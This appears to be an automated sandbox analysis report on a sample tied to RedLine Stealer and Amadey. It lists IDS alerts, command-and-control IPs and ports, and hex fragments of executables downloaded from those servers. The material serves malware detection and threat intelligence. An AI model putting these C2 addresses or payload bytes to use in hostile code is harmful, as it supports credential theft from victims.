Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.81.68.147:1912 -> 192.168.2.5:49738
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49761 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.5:49770 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.5:49769 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.5:49775 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.5:49780 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856150 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M6 : 192.168.2.5:49780 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.5:49781 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856150 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M6 : 192.168.2.5:49781 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.5:49792 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856149 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M5 : 192.168.2.5:49792 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49791 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.5:49794 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.5:49793 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49813 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49832 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49857 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49876 -> 185.81.68.147:1912
Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49876 -> 185.81.68.147:1912
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49877 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.81.68.147:1912 -> 192.168.2.5:49876
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49900 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.81.68.147:1912 -> 192.168.2.5:49876
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49922 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49962 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49943 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49983 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:50041 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:50023 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:50082 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:50058 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:50002 -> 185.81.68.148:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.81.68.147 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.81.68.148 80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 185.81.68.148
Source: Malware configuration extractor	URLs: 185.81.68.147:1912

Source: global traffic

TCP traffic: 192.168.2.5:49738 -> 185.81.68.147:1912

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 08:37:05 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Tue, 10 Dec 2024 15:45:48 GMTETag: "5a452c-628ec5ffff268"Accept-Ranges: bytesContent-Length: 5915948Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 2c 62 58 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 2a 4f 5a 00 02 00 60 c1 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c c7 03 00 78 00 00 00 00 90 04 00 1c f4 00 00 00 60 04 00 08 22 00 00 00 00 00 00 00 00 00 00 00 90 05 00 68 07 00 00 c0 9d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9c 03 00 40 01 00 00 00 00 00 00 00 00 00 00 00 b0 02 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 92 02 00 00 10 00 00 00 94 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 42 26 01 00 00 b0 02 00 00 28 01 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 73 00 00 00 e0 03 00 00 0e 00 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 08 22 00 00 00 60 04 00 00 24 00 00 00 ce 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1c f4 00 00 00 90 04 00 00 f6 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 07 00 00 00 90 05 00 00 08 00 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 08:37:17 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 10:50:51 GMTETag: "4b200-629107cd804d2"Accept-Ranges: bytesContent-Length: 307712Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 e2 02 00 00 20 00 00 00 e4 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c6 c9 01 00 00 20 03 00 00 ca 01 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 02 00 00 00 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 02 03 00 00 00 00 00 48 00 00 00 02 00 05 00 20 83 01 00 1c 7f 01 00 03 00 00 00 8f 02 00 06 28 77 01 00 f8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 75 00 74 00 6f 00 66 00 69 00 6c 00 6c 00 35 00 74 00 59 00 57 00 52 00 71 00 61 00 57 00 56 00 6f 00 61 00 6d 00 68 00 68 00 61 00 6d 00 4a 00 38 00 57 00 57 00 39 00 79 00 62 00 32 00 6c 00 58 00 59 00 57 00 78 00 73 00 5a 00 58 00 51 00 4b 00 61 00 57 00 4a 00 75 00 5a 00 57 00 70 00 6b 00 5a 00 6d 00 70 00 74 00 62 00 57 00 74 00 77 00 59 00 32 00 35 00 73 00 63 00 47 00 56 00 69 00 61 00 32 00 78 00 74 00 62 00 6d 00 74 00 76 00 5a 00 57 00 39 00 70 00 61 00 47 00 39 00 6d 00 5a 00 57 00 4e 00 38 00 56 00 48 00 4a 00 76 00 62 00 6d 00 78 00 70 00 62 00 6d 00 73 00 4b 00 61 00 6d 00 4a 00 6b 00 59 00 57 00 39 00 6a 00 62 00 6d 00 56 00 70 00 61 00 57 00 6c 00 75 00 62 00 57 00 70 00 69 00 61 00 6d 00 78 00 6e 00 59 00 57 00 78 00 6f 00 59 00 32 00 56 00 73 00 5a 00 32 00 4a 00 6c 00 61 00 6d 00 31 00 75 00 61 00 57 00 52 00 38 00 54 00 6d 00 6c 00 6d 00 64 00 48 00 6c 00 58 00 59 00 57 00 78 00 73 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 08:37:19 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 05:53:20 GMTETag: "4b400-6290c54e671ba"Accept-Ranges: bytesContent-Length: 308224Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 5c b7 69 25 3d d9 3a 25 3d d9 3a 25 3d d9 3a 2c 45 4a 3a 26 3d d9 3a 25 3d d8 3a 26 3d d9 3a 4a 4b 72 3a 2d 3d d9 3a 4a 4b 43 3a 24 3d d9 3a 4a 4b 44 3a 24 3d d9 3a 52 69 63 68 25 3d d9 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3c 7a 5a 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 2a 00 00 00 00 00 00 5c 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 68 00 00 28 00 00 00 00 90 00 00 28 03 00 00 00 80 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb 39 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c8 18 00 00 00 50 00 00 00 1a 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 06 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 40 02 00 00 00 80 00 00 00 04 00 00 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 28 03 00 00 00 90 00 00 00 04 00 00 00 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 36 34 00 00 00 00 00 60 04 00 00 a0 00 00 00 54 04 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 08:37:22 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 07:53:47 GMTETag: "6bc00-6290e03a93110"Accept-Ranges: bytesContent-Length: 441344Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd b6 42 53 99 d7 2c 00 99 d7 2c 00 99 d7 2c 00 8d bc 2f 01 94 d7 2c 00 8d bc 29 01 23 d7 2c 00 cb a2 28 01 8b d7 2c 00 cb a2 2f 01 8f d7 2c 00 cb a2 29 01 c0 d7 2c 00 a8 8b d1 00 9b d7 2c 00 8d bc 28 01 8e d7 2c 00 8d bc 2d 01 8a d7 2c 00 99 d7 2d 00 6a d7 2c 00 55 a2 25 01 98 d7 2c 00 55 a2 d3 00 98 d7 2c 00 55 a2 2e 01 98 d7 2c 00 52 69 63 68 99 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8b 96 5a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 fa 04 00 00 00 02 00 00 00 00 00 aa a6 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 46 06 00 c8 00 00 00 00 d0 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 d4 45 00 00 fc e1 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e3 05 00 18 00 00 00 38 e2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 3c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7a f8 04 00 00 10 00 00 00 fa 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 49 01 00 00 10 05 00 00 4a 01 00 00 fe 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 6d 00 00 00 60 06 00 00 2c 00 00 00 48 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 d0 06 00 00 02 00 00 00 74 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 45 00 00 00 e0 06 00 00 46 00 00 00 76 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 08:37:30 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 18:53:38 GMTETag: "138c00-629173b693080"Accept-Ranges: bytesContent-Length: 1281024Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 86 e5 c9 44 c2 84 a7 17 c2 84 a7 17 c2 84 a7 17 d6 ef a3 16 d6 84 a7 17 d6 ef a4 16 d2 84 a7 17 d6 ef a2 16 73 84 a7 17 90 f1 a2 16 86 84 a7 17 90 f1 a3 16 cd 84 a7 17 90 f1 a4 16 c8 84 a7 17 d6 ef a6 16 cf 84 a7 17 c2 84 a6 17 01 84 a7 17 0e f1 ae 16 c6 84 a7 17 0e f1 a7 16 c3 84 a7 17 0e f1 58 17 c3 84 a7 17 0e f1 a5 16 c3 84 a7 17 52 69 63 68 c2 84 a7 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 82 96 5a 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 1d 00 c8 0f 00 00 38 04 00 00 00 00 00 c4 fa 0c 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 80 7e 12 00 58 00 00 00 d8 7e 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 9c ae 00 00 00 00 00 00 00 00 00 00 00 30 14 00 6c 12 00 00 00 95 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 95 11 00 38 01 00 00 00 00 00 00 00 00 00 00 00 e0 0f 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 c7 0f 00 00 10 00 00 00 c8 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9e b3 02 00 00 e0 0f 00 00 b4 02 00 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c bb 00 00 00 a0 12 00 00 44 00 00 00 80 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 9c ae 00 00 00 60 13 00 00 b0 00 00 00 c4 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 fc 00 00 00 00 10 14 00 00 02 00 00 00 74 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 76 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 12 00 00 00 30 14 00 00 14 00 00 00 78 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 08:37:35 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 18:53:40 GMTETag: "1f000-629173b87b500"Accept-Ranges: bytesContent-Length: 126976Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c8 f9 ef 50 8c 98 81 03 8c 98 81 03 8c 98 81 03 98 f3 82 02 86 98 81 03 98 f3 84 02 05 98 81 03 98 f3 85 02 9e 98 81 03 de ed 85 02 83 98 81 03 de ed 82 02 9d 98 81 03 de ed 84 02 ad 98 81 03 98 f3 80 02 8b 98 81 03 8c 98 80 03 ed 98 81 03 40 ed 88 02 8f 98 81 03 40 ed 81 02 8d 98 81 03 40 ed 7e 03 8d 98 81 03 40 ed 83 02 8d 98 81 03 52 69 63 68 8c 98 81 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 84 96 5a 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1d 00 44 01 00 00 b4 00 00 00 00 00 00 62 70 00 00 00 10 00 00 00 60 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 cd 01 00 9c 00 00 00 ac cd 01 00 50 00 00 00 00 00 02 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 f8 1a 00 00 84 bb 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 bb 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 06 43 01 00 00 10 00 00 00 44 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2a 75 00 00 00 60 01 00 00 76 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 1f 00 00 00 e0 01 00 00 14 00 00 00 be 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 00 02 00 00 02 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f8 1a 00 00 00 10 02 00 00 1c 00 00 00 d4 01 00 00 